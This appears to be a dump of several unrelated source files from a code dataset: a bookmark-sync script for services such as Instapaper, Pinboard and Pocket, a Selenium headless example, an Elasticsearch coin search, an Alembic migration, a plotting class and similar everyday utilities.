self.get_url = 'https://www.instapaper.com/api/1/bookmarks/list?limit=500'
self.add_url = 'https://www.instapaper.com/api/1/bookmarks/add'
OAuthClient.__init__(self, key, secret, user, password)
def getBookmarks(self):
response, data = self.http.request(self.get_url, method='GET')
bookmarks = []
jsonData = simplejson.loads(data)
return [{'url': b['url'], 'title': b['title']} for b in jsonData if b['type'] == 'bookmark']
class HttpAuthClient:
def __init__(self, user, password):
passman = urllib.request.HTTPPasswordMgrWithDefaultRealm()
passman.add_password(None, self.get_url, user, password)
passman.add_password(None, self.add_url, user, password)
authhandler = urllib.request.HTTPBasicAuthHandler(passman)
self.url_opener = urllib.request.build_opener(authhandler)
def open(self, url, data=None):
return self.url_opener.open(url, data)
class StackOverflow:
def __init__(self, user):
self.get_url = 'http://api.stackexchange.com/2.1/users/' + user + '/favorites?order=desc&sort=activity&site=stackoverflow'
def getBookmarks(self):
rsp = urllib.request.urlopen(self.get_url)
if rsp.info().get('Content-Encoding') == 'gzip':
buf = StringIO(rsp.read())
rsp = gzip.GzipFile(fileobj=buf)
data = json.load(rsp)
return [{'url' : b['link'], 'title' : b['title']} for b in data['items']]
def addBookmark(self, bookmark):
raise Exception('Not supported')
class Github:
def __init__(self, user):
self.get_url = 'https://api.github.com/users/' + user + '/starred'
def getBookmarks(self):
rsp = urllib.request.urlopen(self.get_url)
data = json.load(rsp)
return [{'url' : b['url'], 'title' : b['name']} for b in data]
def addBookmark(self, bookmark):
raise Exception('Not supported')
class Twitter:
def __init__(self, user, api_key, api_secret, access_token, access_token_secret):
self.get_url = "https://api.twitter.com/1.1/favorites/list.json?screen_name=" + user
self.tweet_url_prefix = "https://twitter.com/" + user + "/status/"
consumer = oauth2.Consumer(api_key, api_secret)
token = oauth2.Token(access_token, access_token_secret)
self.http = oauth2.Client(consumer, token)
def getBookmarks(self):
response, data = self.http.request(self.get_url, method='GET')
bookmarks = []
for b in simplejson.loads(data):
bookmarks.append({'url' : self.tweet_url_prefix + b['id_str'], 'title' : b['text']})
return bookmarks
def addBookmark(self, bookmark):
raise Exception('Not supported')
class Diigo(HttpAuthClient):
def __init__(self, user, password, key):
self.get_url = 'https://secure.diigo.com/api/v2/bookmarks?key=' + key + '&user=' + user
self.add_url = 'https://secure.diigo.com/api/v2/bookmarks'
self.key = key
HttpAuthClient.__init__(self, user, password)
def getBookmarks(self):
data = json.load(self.open(self.get_url))
return [{'url' : b['url'], 'title' : b['title']} for b in data]
def addBookmark(self, bookmark):
add_args=urllib.parse.urlencode({'url' : bookmark['url'], 'title' : bookmark['title'], 'key' : self.key, 'shared' : 'yes'})
self.open(self.add_url, add_args)
'''
During testing the Diigo service sometimes returned a '500 Server error' when adding lots of bookmarks in rapid succession, adding
a brief pause between 'add' operations seemed to fix it - YMMV
time.sleep(1)
'''
class DeliciousLike(HttpAuthClient):
def __init__(self, user, password):
HttpAuthClient.__init__(self, user, password)
def getBookmarks(self):
xml = self.open(self.get_url).read()
dom = parseString(xml)
urls = []
for n in dom.firstChild.childNodes:
if n.nodeType == n.ELEMENT_NODE:
urls.append({'url' : n.getAttribute('href'), 'title' : n.getAttribute('description')})
return urls
def addBookmark(self, bookmark):
params = urllib.parse.urlencode({'url' : bookmark['url'], 'description' : bookmark['title'].encode('utf-8')})
self.open(self.add_url + params)
class PinBoard(DeliciousLike):
def __init__(self, user, password):
self.get_url = 'https://api.pinboard.in/v1/posts/all'
self.add_url = 'https://api.pinboard.in/v1/posts/add?'
DeliciousLike.__init__(self, user, password)
class PinBoard2(DeliciousLike):
def __init__(self, user, token):
auth_token = user + ':' + token
self.get_url = 'https://api.pinboard.in/v1/posts/all?auth_token=' + auth_token
self.add_url = 'https://api.pinboard.in/v1/posts/add?auth_token=' + auth_token + '&'
def open(self, url, data=None):
return urllib.request.urlopen(url, data)
class Delicious(DeliciousLike):
def __init__(self, user, password):
self.get_url = 'https://api.del.icio.us/v1/posts/all'
self.add_url = 'https://api.del.icio.us/v1/posts/add?'
DeliciousLike.__init__(self, user, password)
class Pocket:
def __init__(self, user, password, key):
base_args=urllib.parse.urlencode({'username' : user, 'password' : password, 'apikey' : key})
self.get_url = 'https://readitlaterlist.com/v2/get?' + base_args + '&'
self.add_url = 'https://readitlaterlist.com/v2/add?' + base_args + '&'
def getBookmarks(self):
get_args=urllib.parse.urlencode({'state' : 'unread'})
data = json.load(urllib.request.urlopen(self.get_url + get_args))
return [{'url' : b['url'], 'title' : b['title']} for b in list(data['list'].values())]
def addBookmark(self, bookmark):
add_args=urllib.parse.urlencode({'url' : bookmark['url']})
urllib.request.urlopen(self.add_url + add_args)
config = configparser.RawConfigParser()
config.read('config.txt')
def buildReadability():
SECTION = 'Readability'
return Readability(config.get(SECTION, 'key'), config.get(SECTION, 'secret'), config.get(SECTION, 'user'), config.get(SECTION, 'password'))
def buildPocket():
SECTION = 'Pocket'
return Pocket(config.get(SECTION, 'user'), config.get(SECTION, 'password'), config.get(SECTION, 'key'))
def buildPinBoard():
SECTION = 'PinBoard'
return PinBoard(config.get(SECTION, 'user'), config.get(SECTION, 'password'))
def buildPinBoard2():
SECTION = 'PinBoard'
return PinBoard2(config.get(SECTION, 'user'), config.get(SECTION, 'token'))
def buildDelicious():
SECTION = 'Delicious'
return Delicious(config.get(SECTION, 'user'), config.get(SECTION, 'password'))
def buildInstapaper():
SECTION = 'Instapaper'
return Instapaper(config.get(SECTION, 'key'), config.get(SECTION, 'secret'), config.get(SECTION, 'user'), config.get(SECTION, 'password'))
def buildDiigo():
SECTION = 'Diigo'
return Diigo(config.get(SECTION, 'user'), config.get(SECTION, 'password'), config.get(SECTION, 'key'))
def buildStackOverflow():
SECTION = 'StackOverflow'
return StackOverflow(config.get(SECTION, 'user'))
def buildGithub():
SECTION = 'Github'
return Github(config.get(SECTION, 'user'))
def buildTwitter():
SECTION = 'Twitter'
return Twitter(config.get(SECTION, 'user'), config.get(SECTION, 'api_key'), config.get(SECTION, 'api_secret'), config.get(SECTION, 'access_token'), config.get(SECTION, 'access_token_secret'))
| import sys
import json
import urllib.request, urllib.error, urllib.parse
import simplejson
from xml.dom.minidom import parseString
import xml.dom.minidom
import oauth2
import configparser
from io import StringIO
import gzip
class OAuthClient:
def __init__(self, key, secret, user, password):
consumer = oauth2.Consumer(key, secret)
client = oauth2.Client(consumer)
resp, content = client.request(self.token_url, "POST", urllib.parse.urlencode({
'x_auth_mode': 'client_auth',
'x_auth_username': user,
'x_auth_password': password
}))
token = dict(urllib.parse.parse_qsl(content.decode('UTF-8')))
token = oauth2.Token(token['oauth_token'], token['oauth_token_secret'])
self.http = oauth2.Client(consumer, token)
def getBookmarks(self):
response, data = self.http.request(self.get_url, method='GET')
bookmarks = []
jsonData = simplejson.loads(data)
for b in simplejson.loads(data)['bookmarks']:
article = b['article']
bookmarks.append({'url' : article['url'], 'title' : article['title']})
return bookmarks
def addBookmark(self, bookmark):
self.http.request(self.add_url, method='POST', body=urllib.parse.urlencode({
'url': bookmark['url'],
'title': bookmark['title'].encode('utf-8')
}))
class Readability(OAuthClient):
def __init__(self, key, secret, user, password):
self.token_url = 'https://www.readability.com/api/rest/v1/oauth/access_token/'
self.get_url = 'https://www.readability.com/api/rest/v1/bookmarks'
self.add_url = 'https://www.readability.com/api/rest/v1/bookmarks'
OAuthClient.__init__(self, key, secret, user, password)
class Instapaper(OAuthClient):
def __init__(self, key, secret, user, password):
self.token_url = 'https://www.instapaper.com/api/1/oauth/access_token'
self.get_url = 'https://www.instapaper.com/api/1/bookmarks/list?limit=500'
self.add_url = 'https://www.instapaper.com/api/1/bookmarks/add'
OAuthClient.__init__(self, key, secret, user, password)
def getBookmarks(self):
response, data = self.http.request(self.get_url, method='GET')
bookmarks = []
jsonData = simplejson.loads(data)
return [{'url': b['url'], 'title': b['title']} for b in jsonData if b['type'] == 'bookmark']
class HttpAuthClient:
def __init__(self, user, password):
passman = urllib.request.HTTPPasswordMgrWithDefaultRealm()
passman.add_password(None, self.get_url, user, password)
passman.add_password(None, self.add_url, user, password)
authhandler = urllib.request.HTTPBasicAuthHandler(passman)
self.url_opener = urllib.request.build_opener(authhandler)
def open(self, url, data=None):
return self.url_opener.open(url, data)
class StackOverflow:
def __init__(self, user):
self.get_url = 'http://api.stackexchange.com/2.1/users/' + user + '/favorites?order=desc&sort=activity&site=stackoverflow'
def getBookmarks(self):
rsp = urllib.request.urlopen(self.get_url)
if rsp.info().get('Content-Encoding') == 'gzip':
buf = StringIO(rsp.read())
rsp = gzip.GzipFile(fileobj=buf)
data = json.load(rsp)
return [{'url' : b['link'], 'title' : b['title']} for b in data['items']]
def addBookmark(self, bookmark):
raise Exception('Not supported')
class Github:
def __init__(self, user):
self.get_url = 'https://api.github.com/users/' + user + '/starred'
def getBookmarks(self):
rsp = urllib.request.urlopen(self.get_url)
data = json.load(rsp)
return [{'url' : b['url'], 'title' : b['name']} for b in data]
def addBookmark(self, bookmark):
raise Exception('Not supported')
class Twitter:
def __init__(self, user, api_key, api_secret, access_token, access_token_secret):
self.get_url = "https://api.twitter.com/1.1/favorites/list.json?screen_name=" + user
self.tweet_url_prefix = "https://twitter.com/" + user + "/status/"
consumer = oauth2.Consumer(api_key, api_secret)
token = oauth2.Token(access_token, access_token_secret)
self.http = oauth2.Client(consumer, token)
def getBookmarks(self):
response, data = self.http.request(self.get_url, method='GET')
bookmarks = []
for b in simplejson.loads(data):
bookmarks.append({'url' : self.tweet_url_prefix + b['id_str'], 'title' : b['text']})
return bookmarks
def addBookmark(self, bookmark):
raise Exception('Not supported')
class Diigo(HttpAuthClient):
def __init__(self, user, password, key):
self.get_url = 'https://secure.diigo.com/api/v2/bookmarks?key=' + key + '&user=' + user
self.add_url = 'https://secure.diigo.com/api/v2/bookmarks'
self.key = key
HttpAuthClient.__init__(self, user, password)
def getBookmarks(self):
data = json.load(self.open(self.get_url))
return [{'url' : b['url'], 'title' : b['title']} for b in data]
def addBookmark(self, bookmark):
add_args=urllib.parse.urlencode({'url' : bookmark['url'], 'title' : bookmark['title'], 'key' : self.key, 'shared' : 'yes'})
self.open(self.add_url, add_args)
'''
During testing the Diigo service sometimes returned a '500 Server error' when adding lots of bookmarks in rapid succession, adding
a brief pause between 'add' operations seemed to fix it - YMMV
time.sleep(1)
'''
class DeliciousLike(HttpAuthClient):
def __init__(self, user, password):
HttpAuthClient.__init__(self, user, password)
def getBookmarks(self):
xml = self.open(self.get_url).read()
dom = parseString(xml)
urls = []
for n in dom.firstChild.childNodes:
if n.nodeType == n.ELEMENT_NODE:
urls.append({'url' : n.getAttribute('href'), 'title' : n.getAttribute('description')})
return urls
def addBookmark(self, bookmark):
params = urllib.parse.urlencode({'url' : bookmark['url'], 'description' : bookmark['title'].encode('utf-8')})
self.open(self.add_url + params)
class PinBoard(DeliciousLike):
def __init__(self, user, password):
self.get_url = 'https://api.pinboard.in/v1/posts/all'
self.add_url = 'https://api.pinboard.in/v1/posts/add?'
DeliciousLike.__init__(self, user, password)
class PinBoard2(DeliciousLike):
def __init__(self, user, token):
auth_token = user + ':' + token
self.get_url = 'https://api.pinboard.in/v1/posts/all?auth_token=' + auth_token
self.add_url = 'https://api.pinboard.in/v1/posts/add?auth_token=' + auth_token + '&'
def open(self, url, data=None):
return urllib.request.urlopen(url, data)
class Delicious(DeliciousLike):
def __init__(self, user, password):
self.get_url = 'https://api.del.icio.us/v1/posts/all'
self.add_url = 'https://api.del.icio.us/v1/posts/add?'
DeliciousLike.__init__(self, user, password)
class Pocket:
def __init__(self, user, password, key):
base_args=urllib.parse.urlencode({'username' : user, 'password' : password, 'apikey' : key})
self.get_url = 'https://readitlaterlist.com/v2/get?' + base_args + '&'
self.add_url = 'https://readitlaterlist.com/v2/add?' + base_args + '&'
def getBookmarks(self):
get_args=urllib.parse.urlencode({'state' : 'unread'})
data = json.load(urllib.request.urlopen(self.get_url + get_args))
return [{'url' : b['url'], 'title' : b['title']} for b in list(data['list'].values())]
def addBookmark(self, bookmark):
add_args=urllib.parse.urlencode({'url' : bookmark['url']})
urllib.request.urlopen(self.add_url + add_args)
config = configparser.RawConfigParser()
config.read('config.txt')
def buildReadability():
SECTION = 'Readability'
return Readability(config.get(SECTION, 'key'), config.get(SECTION, 'secret'), config.get(SECTION, 'user'), config.get(SECTION, 'password'))
def buildPocket():
SECTION = 'Pocket'
return Pocket(config.get(SECTION, 'user'), config.get(SECTION, 'password'), config.get(SECTION, 'key'))
def buildPinBoard():
SECTION = 'PinBoard'
return PinBoard(config.get(SECTION, 'user'), config.get(SECTION, 'password'))
def buildPinBoard2():
SECTION = 'PinBoard'
return PinBoard2(config.get(SECTION, 'user'), config.get(SECTION, 'token'))
def buildDelicious():
SECTION = 'Delicious'
return Delicious(config.get(SECTION, 'user'), config.get(SECTION, 'password'))
def buildInstapaper():
SECTION = 'Instapaper'
return Instapaper(config.get(SECTION, 'key'), config.get(SECTION, 'secret'), config.get(SECTION, 'user'), config.get(SECTION, 'password'))
def buildDiigo():
SECTION = 'Diigo'
return Diigo(config.get(SECTION, 'user'), config.get(SECTION, 'password'), config.get(SECTION, 'key'))
def buildStackOverflow():
SECTION = 'StackOverflow'
return StackOverflow(config.get(SECTION, 'user'))
def buildGithub():
SECTION = 'Github'
return Github(config.get(SECTION, 'user'))
def buildTwitter():
SECTION = 'Twitter'
return Twitter(config.get(SECTION, 'user'), config.get(SECTION, 'api_key'), config.get(SECTION, 'api_secret'), config.get(SECTION, 'access_token'), config.get(SECTION, 'access_token_secret')) | en | 0.878872 | During testing the Diigo service sometimes returned a '500 Server error' when adding lots of bookmarks in rapid succession, adding a brief pause between 'add' operations seemed to fix it - YMMV time.sleep(1) | 2.887411 | 3 |
Lessons/source/try_this.py | campbellmarianna/Core-Data-Structures | 0 | 6617386 | <gh_stars>0
#encode function psuedocode # Inpsired by <NAME>
# create var with string type named encode_str
# create var current_power value with value int 0
# create var finished set to False
# create empty list named list_of_powers
# Run a loop while finished is False
# multiply the given bass with an exponent of the var set to zero store the product in a var named power_vlue
# check if power_value is less than the given number
# if it is insert current_power at index[ ] zero into the list list_of_power
# okay if that first condition wasn't true check if the power_value is equal to the number
# if it is insert current_power at index 0
# set finished to True
# if none of the first conditions were true
# set finished to True
# loop through list_of_powers
# multiply given bases by power and set that equal to a variable power_value
# divide given number by power_value and set it to limit make that value stored in limit as a int()
# deincrement by the product times the limit
# increment encode_str var by string
| #encode function psuedocode # Inpsired by <NAME>
# create var with string type named encode_str
# create var current_power value with value int 0
# create var finished set to False
# create empty list named list_of_powers
# Run a loop while finished is False
# multiply the given bass with an exponent of the var set to zero store the product in a var named power_vlue
# check if power_value is less than the given number
# if it is insert current_power at index[ ] zero into the list list_of_power
# okay if that first condition wasn't true check if the power_value is equal to the number
# if it is insert current_power at index 0
# set finished to True
# if none of the first conditions were true
# set finished to True
# loop through list_of_powers
# multiply given bases by power and set that equal to a variable power_value
# divide given number by power_value and set it to limit make that value stored in limit as a int()
# deincrement by the product times the limit
# increment encode_str var by string | en | 0.840113 | #encode function psuedocode # Inpsired by <NAME> # create var with string type named encode_str # create var current_power value with value int 0 # create var finished set to False # create empty list named list_of_powers # Run a loop while finished is False # multiply the given bass with an exponent of the var set to zero store the product in a var named power_vlue # check if power_value is less than the given number # if it is insert current_power at index[ ] zero into the list list_of_power # okay if that first condition wasn't true check if the power_value is equal to the number # if it is insert current_power at index 0 # set finished to True # if none of the first conditions were true # set finished to True # loop through list_of_powers # multiply given bases by power and set that equal to a variable power_value # divide given number by power_value and set it to limit make that value stored in limit as a int() # deincrement by the product times the limit # increment encode_str var by string | 3.506721 | 4 |
selenium__examples/hide_window__invisible__headless.py | DazEB2/SimplePyScripts | 117 | 6617387 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
# pip install selenium
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
options = Options()
options.add_argument('--headless')
driver = webdriver.Firefox(options=options)
driver.get('https://www.google.com/doodles')
print('Title: "{}"'.format(driver.title))
driver.quit()
| #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
# pip install selenium
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
options = Options()
options.add_argument('--headless')
driver = webdriver.Firefox(options=options)
driver.get('https://www.google.com/doodles')
print('Title: "{}"'.format(driver.title))
driver.quit()
| en | 0.318347 | #!/usr/bin/env python3 # -*- coding: utf-8 -*- # pip install selenium | 2.517881 | 3 |
search/coinsearch.py | skwongg/coins | 1 | 6617388 | from elasticsearch import Elasticsearch
from coin.models import Coin
import requests
import os
es = Elasticsearch()
def build_coin_index():
es.indices.create(index='coins', ignore=400)
response = es.search()
for coin in Coin.objects.all():
es.index(index="coins",
doc_type="coin",
id=coin.id,
body={
"id": coin.pk,
"name": coin.name,
"ticker": coin.ticker,
"pair": coin.pair,
"price": coin.price,
"btc_price": coin.btc_price,
"icon_url": coin.icon_url
}
)
def search(querystring):
ES_COIN_SEARCH_URL = os.environ.get("ES_COIN_SEARCH_URL") + """size=10&q=pair:*{0}*""".format(querystring)
res = requests.get(ES_COIN_SEARCH_URL).json()
return res
| from elasticsearch import Elasticsearch
from coin.models import Coin
import requests
import os
es = Elasticsearch()
def build_coin_index():
es.indices.create(index='coins', ignore=400)
response = es.search()
for coin in Coin.objects.all():
es.index(index="coins",
doc_type="coin",
id=coin.id,
body={
"id": coin.pk,
"name": coin.name,
"ticker": coin.ticker,
"pair": coin.pair,
"price": coin.price,
"btc_price": coin.btc_price,
"icon_url": coin.icon_url
}
)
def search(querystring):
ES_COIN_SEARCH_URL = os.environ.get("ES_COIN_SEARCH_URL") + """size=10&q=pair:*{0}*""".format(querystring)
res = requests.get(ES_COIN_SEARCH_URL).json()
return res
| en | 0.111233 | size=10&q=pair:*{0}* | 2.789344 | 3 |
rl_toolkit/utils/variable_container.py | markub3327/rl-toolk | 7 | 6617389 | <gh_stars>1-10
import reverb
import tensorflow as tf
class VariableContainer:
def __init__(
self,
# ---
db_server: str,
# ---
table: str,
variables: dict,
):
self._table = table
self._variables = variables
# Initializes the reverb client
self.tf_client = reverb.TFClient(server_address=db_server)
# variables signature for variable container table
self.signature = tf.nest.map_structure(
lambda variable: tf.TensorSpec(variable.shape, dtype=variable.dtype),
self._variables,
)
self.dtypes = tf.nest.map_structure(lambda spec: spec.dtype, self.signature)
def update_variables(self):
sample = self.tf_client.sample(self._table, data_dtypes=[self.dtypes]).data[0]
for variable, value in zip(
tf.nest.flatten(self._variables), tf.nest.flatten(sample)
):
variable.assign(value)
def push_variables(self):
self.tf_client.insert(
data=tf.nest.flatten(self._variables),
tables=tf.constant([self._table]),
priorities=tf.constant([1.0], dtype=tf.float64),
)
def __getitem__(self, key):
return self._variables[key]
| import reverb
import tensorflow as tf
class VariableContainer:
def __init__(
self,
# ---
db_server: str,
# ---
table: str,
variables: dict,
):
self._table = table
self._variables = variables
# Initializes the reverb client
self.tf_client = reverb.TFClient(server_address=db_server)
# variables signature for variable container table
self.signature = tf.nest.map_structure(
lambda variable: tf.TensorSpec(variable.shape, dtype=variable.dtype),
self._variables,
)
self.dtypes = tf.nest.map_structure(lambda spec: spec.dtype, self.signature)
def update_variables(self):
sample = self.tf_client.sample(self._table, data_dtypes=[self.dtypes]).data[0]
for variable, value in zip(
tf.nest.flatten(self._variables), tf.nest.flatten(sample)
):
variable.assign(value)
def push_variables(self):
self.tf_client.insert(
data=tf.nest.flatten(self._variables),
tables=tf.constant([self._table]),
priorities=tf.constant([1.0], dtype=tf.float64),
)
def __getitem__(self, key):
return self._variables[key] | en | 0.780953 | # --- # --- # Initializes the reverb client # variables signature for variable container table | 2.365169 | 2 |
Visualizer/Source/Visualizer/Plotting/TablePlot.py | NB4444/BachelorProjectEnergyManager | 0 | 6617390 | import pandas
from IPython.display import display
from typing import Any, List
from Visualizer.Plotting.Plot import Plot
class TablePlot(Plot):
def __init__(self, title: str, table: List[Any], columns: List[str], maximum_column_width: int = None,
maximum_columns: int = None, minimum_rows: int = None, maximum_rows: int = 50,
interpolate: bool = False):
super().__init__(title)
self.table = table
self.columns = columns
self.maximum_column_width = maximum_column_width
self.maximum_columns = maximum_columns
self.minimum_rows = minimum_rows
self.maximum_rows = maximum_rows
self.interpolate = interpolate
def on_plot(self):
pandas.options.display.max_colwidth = self.maximum_column_width
pandas.options.display.max_columns = self.maximum_columns
pandas.options.display.min_rows = self.minimum_rows
pandas.options.display.max_rows = self.maximum_rows
display(self.pandas_table)
@property
def pandas_table(self):
table = pandas.DataFrame(self.table, columns=self.columns).infer_objects()
return table.interpolate(method="linear", limit_direction="both") if self.interpolate else table
def merge(self, table_plot: "TablePlot"):
# Add columns from the other table
added_columns = 0
for column in table_plot.columns:
if column not in self.columns:
self.columns.append(column)
added_columns += 1
# Add new empty values for any new columns
new_table = []
for row in self.table:
new_table.append(row + added_columns * [float("NaN")])
self.table = new_table
# Add rows from the other table
for row in table_plot.table:
new_row = []
for column in self.columns:
new_row.append(row[table_plot.columns.index(column)] if column in table_plot.columns else float("NaN"))
self.table.append(new_row)
| import pandas
from IPython.display import display
from typing import Any, List
from Visualizer.Plotting.Plot import Plot
class TablePlot(Plot):
def __init__(self, title: str, table: List[Any], columns: List[str], maximum_column_width: int = None,
maximum_columns: int = None, minimum_rows: int = None, maximum_rows: int = 50,
interpolate: bool = False):
super().__init__(title)
self.table = table
self.columns = columns
self.maximum_column_width = maximum_column_width
self.maximum_columns = maximum_columns
self.minimum_rows = minimum_rows
self.maximum_rows = maximum_rows
self.interpolate = interpolate
def on_plot(self):
pandas.options.display.max_colwidth = self.maximum_column_width
pandas.options.display.max_columns = self.maximum_columns
pandas.options.display.min_rows = self.minimum_rows
pandas.options.display.max_rows = self.maximum_rows
display(self.pandas_table)
@property
def pandas_table(self):
table = pandas.DataFrame(self.table, columns=self.columns).infer_objects()
return table.interpolate(method="linear", limit_direction="both") if self.interpolate else table
def merge(self, table_plot: "TablePlot"):
# Add columns from the other table
added_columns = 0
for column in table_plot.columns:
if column not in self.columns:
self.columns.append(column)
added_columns += 1
# Add new empty values for any new columns
new_table = []
for row in self.table:
new_table.append(row + added_columns * [float("NaN")])
self.table = new_table
# Add rows from the other table
for row in table_plot.table:
new_row = []
for column in self.columns:
new_row.append(row[table_plot.columns.index(column)] if column in table_plot.columns else float("NaN"))
self.table.append(new_row)
| en | 0.274878 | # Add columns from the other table # Add new empty values for any new columns # Add rows from the other table | 3.028429 | 3 |
alembic/versions/00031_85a1c0888f3d_.py | awesome-archive/ReadableWebProxy | 193 | 6617391 | <filename>alembic/versions/00031_85a1c0888f3d_.py
"""empty message
Revision ID: <KEY>
Revises: <PASSWORD>
Create Date: 2017-03-08 04:51:21.957091
"""
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = 'be<PASSWORD>'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
from sqlalchemy_utils.types import TSVectorType
from sqlalchemy_searchable import make_searchable
import sqlalchemy_utils
# Patch in knowledge of the citext type, so it reflects properly.
from sqlalchemy.dialects.postgresql.base import ischema_names
import citext
import queue
import datetime
from sqlalchemy.dialects.postgresql import ENUM
from sqlalchemy.dialects.postgresql import JSON
from sqlalchemy.dialects.postgresql import TSVECTOR
ischema_names['citext'] = citext.CIText
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker, Session as BaseSession, relationship
from sqlalchemy import Column
from sqlalchemy import BigInteger
from sqlalchemy import Integer
from sqlalchemy import Text
from sqlalchemy import Float
from sqlalchemy import Boolean
from sqlalchemy import DateTime
from sqlalchemy import ForeignKey
from sqlalchemy import PrimaryKeyConstraint
from sqlalchemy import UniqueConstraint
from sqlalchemy.orm import relationship
from sqlalchemy.schema import UniqueConstraint
Session = sessionmaker()
Base = declarative_base()
class RssFeedEntry(Base):
__versioned__ = {}
__tablename__ = 'rss_parser_funcs'
name = 'rss_parser_funcs'
id = Column(BigInteger, primary_key = True, index = True)
last_changed = Column(DateTime, nullable=False)
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('rss_parser_funcs', sa.Column('last_changed', sa.DateTime(), nullable=True))
op.add_column('rss_parser_funcs_version', sa.Column('last_changed', sa.DateTime(), autoincrement=False, nullable=True))
bind = op.get_bind()
sess = Session(bind=bind)
print("Updating date/time stamps for functions.")
sess.query(RssFeedEntry).update({'last_changed' : datetime.datetime.now()})
sess.commit()
print("Update done.")
op.alter_column('rss_parser_funcs', 'last_changed', nullable=False)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('rss_parser_funcs_version', 'last_changed')
op.drop_column('rss_parser_funcs', 'last_changed')
### end Alembic commands ###
| <filename>alembic/versions/00031_85a1c0888f3d_.py
"""empty message
Revision ID: <KEY>
Revises: <PASSWORD>
Create Date: 2017-03-08 04:51:21.957091
"""
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = 'be<PASSWORD>'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
from sqlalchemy_utils.types import TSVectorType
from sqlalchemy_searchable import make_searchable
import sqlalchemy_utils
# Patch in knowledge of the citext type, so it reflects properly.
from sqlalchemy.dialects.postgresql.base import ischema_names
import citext
import queue
import datetime
from sqlalchemy.dialects.postgresql import ENUM
from sqlalchemy.dialects.postgresql import JSON
from sqlalchemy.dialects.postgresql import TSVECTOR
ischema_names['citext'] = citext.CIText
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker, Session as BaseSession, relationship
from sqlalchemy import Column
from sqlalchemy import BigInteger
from sqlalchemy import Integer
from sqlalchemy import Text
from sqlalchemy import Float
from sqlalchemy import Boolean
from sqlalchemy import DateTime
from sqlalchemy import ForeignKey
from sqlalchemy import PrimaryKeyConstraint
from sqlalchemy import UniqueConstraint
from sqlalchemy.orm import relationship
from sqlalchemy.schema import UniqueConstraint
Session = sessionmaker()
Base = declarative_base()
class RssFeedEntry(Base):
__versioned__ = {}
__tablename__ = 'rss_parser_funcs'
name = 'rss_parser_funcs'
id = Column(BigInteger, primary_key = True, index = True)
last_changed = Column(DateTime, nullable=False)
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('rss_parser_funcs', sa.Column('last_changed', sa.DateTime(), nullable=True))
op.add_column('rss_parser_funcs_version', sa.Column('last_changed', sa.DateTime(), autoincrement=False, nullable=True))
bind = op.get_bind()
sess = Session(bind=bind)
print("Updating date/time stamps for functions.")
sess.query(RssFeedEntry).update({'last_changed' : datetime.datetime.now()})
sess.commit()
print("Update done.")
op.alter_column('rss_parser_funcs', 'last_changed', nullable=False)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('rss_parser_funcs_version', 'last_changed')
op.drop_column('rss_parser_funcs', 'last_changed')
### end Alembic commands ###
| en | 0.513848 | empty message Revision ID: <KEY> Revises: <PASSWORD> Create Date: 2017-03-08 04:51:21.957091 # revision identifiers, used by Alembic. # Patch in knowledge of the citext type, so it reflects properly. ### commands auto generated by Alembic - please adjust! ### ### end Alembic commands ### ### commands auto generated by Alembic - please adjust! ### ### end Alembic commands ### | 1.751234 | 2 |
tools/count_blueprints.py | uggla/nova-specs | 44 | 6617392 | #!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import argparse
import os
import lib
def get_options():
parser = argparse.ArgumentParser(
description='Count blueprints for a given release. Requires '
'launchpadlib to be installed.')
parser.add_argument('release', help='The release to process.',
choices=lib.get_releases())
return parser.parse_args()
def count_blueprints(release):
lp_nova = lib.get_lp_nova('count-specs')
# Valid specifications are specifications that are not obsolete.
blueprints = lp_nova.getSeries(name=release).valid_specifications
targeted = len(blueprints)
approved = 0
implemented = 0
unapproved_blueprint_names = set()
for blueprint in blueprints:
if blueprint.definition_status == 'Approved':
approved += 1
else:
unapproved_blueprint_names.add(blueprint.name)
if blueprint.implementation_status == 'Implemented':
implemented += 1
print('')
print('Summary')
print('-------')
print('Number of Targeted blueprints: %d' % targeted)
print('Number of Approved blueprints: %d' % approved)
print('Number of Implemented blueprints: %d' % implemented)
# Check for approved specs whose blueprints have not been approved
cwd = os.getcwd()
approved_dir = os.path.join(cwd, 'specs', release, 'approved')
approved_specs = os.listdir(approved_dir)
template_file = '%s-template.rst' % release
for spec_fname in sorted(approved_specs):
# get the blueprint name, it should be the name of the rst file
if not spec_fname.endswith('.rst'):
continue
# check for the template file and skip that
if spec_fname == template_file:
continue
bp_name = spec_fname.split('.rst')[0]
if bp_name in unapproved_blueprint_names:
print('WARNING: Blueprint for spec %s needs approval.' %
spec_fname)
def main():
opts = get_options()
count_blueprints(opts.release)
if __name__ == '__main__':
main()
| #!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import argparse
import os
import lib
def get_options():
parser = argparse.ArgumentParser(
description='Count blueprints for a given release. Requires '
'launchpadlib to be installed.')
parser.add_argument('release', help='The release to process.',
choices=lib.get_releases())
return parser.parse_args()
def count_blueprints(release):
lp_nova = lib.get_lp_nova('count-specs')
# Valid specifications are specifications that are not obsolete.
